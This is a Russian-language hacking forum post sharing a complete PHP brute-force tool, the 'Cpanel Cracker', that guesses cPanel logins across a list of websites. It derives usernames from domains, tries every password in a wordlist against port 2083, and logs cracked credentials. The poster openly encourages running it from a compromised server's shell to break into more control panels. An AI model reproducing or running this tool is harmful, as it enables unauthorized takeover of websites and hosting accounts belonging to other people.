Авторизация  
опаsный

Cpanel Cracker

В теме 1 сообщение


Собствено на пехэ сделаный брутер "крякер" cPanel Норм вещь, особено если нету больше вариков ломануть сайтец. Вот видео про него как оно работает.



ВИДЕО





А вот он сам





PHP код:

<?php

set_time_limit
(0);



/********************************************************************

* Private Cpanel Cracker

* Coded by Miyachung

* [email protected]

* Janissaries.Org

* Demonstration ->

*********************************************************************/




class cracker

{



  public  
$sitelist;

  public  
$passlist;

  

  public function
calis()

  {

  
$usernames =   $this->make_username();

  
$sitelist =  explode("
"
,$this->openfile($this->sitelist));  

  
$passlist =  explode("
"
,$this->openfile($this->passlist));

  
$increment = 0;

  

  echo
"
[*]Site list ->
$this->sitelist
"
;

  echo
"[*]Pass list -> $this->passlist
"
;

  echo
"[*]Total urls -> ".count($sitelist)."
"
;

  echo
"[*]Total pass -> ".count($passlist)."
"
;

  echo
"[*]Cracking started

"
;

  

  foreach(
$sitelist as $id => $site)

  {

  
$increment++;

  
$site = trim($site);

  echo
"-------------------------------------------------------
"
;

  echo
"[*]Trying site: ".$site." $increment / ".count($sitelist)."
"
;

  if(
eregi('http',$site)){

  
$site = str_replace("http://","https://",$site);

  }else{

  
$site = "https://$site";

  }

  
$site= $site.":2083";

  

  if(!
$this->pass_site($site))

  {

  echo
"[-]Not cpanel,passing site
"
;

  echo
"-------------------------------------------------------

"
;

  continue;

  }



  echo
"[*]Connected Cpanel [OK]
"
;

  echo
"[*]Username: ".$usernames[$id]."
"
;

  echo
"[*]Loaded ".count($passlist)." passwords
"
;

  echo
"[*]Coded by Miyachung ||| Janissaries.Org
"
;

foreach(
$passlist as $pass)

{

  
$cracked = false;

  

  
$pass=trim($pass);

  

  
$result = $this->post($site,$usernames[$id],$pass);

  

  if(
preg_match('/security_token/',$result))

  {

  
$cracked = true;

  echo
"[+]$pass password cracked for $usernames[$id]
"
;

  echo
"-------------------------------------------------------

"
;

  
$this->savefile("$site|$usernames[$id]|$pass");

  break;

  }

  

}

  if(!
$cracked){echo "[-]Not found
"
;echo "-------------------------------------------------------

"
;}

  }

  

  }

  

  private function
make_username()

  {

  
$op = explode("
"
,$this->openfile($this->sitelist));

  foreach(
$op as $site)

  {

  

  if(
eregi('http://',$site)) $site  = str_replace("http://","",$site);

  if(!
eregi('www',$site)) $site  = "www.".$site;

  

  
$site  =  explode(".",$site);

  
$site  = str_replace("-","",$site[1]);

  

  
$usernames[] = substr($site,0,8);

  

  }

  return
$usernames;

  }

  

  public function
lists()

  {

  echo
"[!]Site list: ";

  
$sitelist = fgets(STDIN);

  
$sitelist = str_replace("
"
,"",$sitelist);

  
$sitelist = trim($sitelist);

  echo
"[!]Pass list: ";

  
$passlist = fgets(STDIN);

  
$passlist = str_replace("
"
,"",$passlist);

  
$passlist = trim($passlist);

  

  return array(
$sitelist,$passlist);

  }

  

  private function
post($site,$user,$pass)

  {

  
$curl = curl_init();

  
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);

  
curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");

  
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);

  
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);

  
curl_setopt($curl,CURLOPT_TIMEOUT,7);

  
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);

  
curl_setopt($curl,CURLOPT_POST,1);

  
curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");

  
$exec = curl_exec($curl);

  return
$exec;

  }

  

  private function
pass_site($site)

  {

  
$curl = curl_init();

  
curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);

  
curl_setopt($curl,CURLOPT_URL,$site);

  
curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);

  
curl_setopt($curl,CURLOPT_SSL_VERIFYPEER
,0);

  curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);

  curl_setopt($curl,CURLOPT_TIMEOUT,7);

  $exec = curl_exec($curl);

  $info = curl_getinfo($curl);

  

  if($info['http_code'] != 0)

  {

  return true;

  }

  else

  {

  return false;

  }

  

  }

  

  private function openfile($file)

  {

  $file = @file_get_contents($file);

  if(!$file) exit("WTF File not found ?");

  return $file;

  }

  

  private function savefile($content)

  {

  $file = fopen('crackerlog.txt','ab');

  fwrite($file,$content."
");

  fclose($file);

  return $file;

  }



}



$class    = new cracker();

$lists    = $class->lists();



  if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? ");

  

$class->sitelist = $lists[0];

$class->passlist = $lists[1];

$class->calis();





?>   Грузите на шелле данный сабж, ломайте больше панелек, и будет вам счастье! images/smilies/smile.gif




Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
Авторизация